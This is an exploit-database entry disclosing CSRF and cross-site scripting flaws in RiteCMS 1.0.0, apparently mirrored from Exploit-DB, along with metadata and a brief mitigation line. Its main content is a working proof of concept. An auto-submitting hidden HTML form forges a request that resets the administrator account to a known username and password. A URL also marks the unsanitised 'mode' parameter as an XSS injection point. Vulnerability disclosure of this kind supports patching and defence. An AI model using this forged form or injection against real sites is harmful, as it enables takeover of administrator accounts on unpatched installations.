header-logo
Suggest Exploit
vendor:
RiteCMS
by:
Yashar shahinzadeh
8,8
CVSS
HIGH
CSRF & Cross Site Scripting
352 (Cross-Site Request Forgery) & 79 (Cross-site Scripting)
CWE
Product Name: RiteCMS
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: ritecms.1.0.0.tinymce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux & Windows, PHP 5.2.9
2013

RiteCMS multiple vulnerabilities

RiteCMS is vulnerable to CSRF which allows an attacker to change the administrator's password and Cross Site Scripting which allows an attacker to inject malicious JavaScript code into the application.

Mitigation:

Implementing a CSRF token in the application and validating user input to prevent XSS attacks.
Source

Exploit-DB raw data:

###########################################################################################
# Exploit Title: RiteCMS multiple vulnerabilities
# Date: 2013 30 July
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://ritecms.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 1.0.0
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################

Summary:
========
1. CSRF - Change administrator's password
2. Cross site scripting

1. CSRF - Adding an admin account:
==================================

<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="http://[Path to RiteCMS]/cms/index.php" method="post">
                <input type="hidden" name="mode" value="users">
                <input type="hidden" name="id" value="1">
                <input type="hidden" name="name" value="admin1">
				<input type="hidden" name="new_pw" value="admin">
				<input type="hidden" name="new_pw_r" value="admin">
				<input type="hidden" name="type" value="1">
				<input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>


2. Cross site scripting (After auth):
=====================================
http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]

Navigation

Suggest Exploit

Services By CQR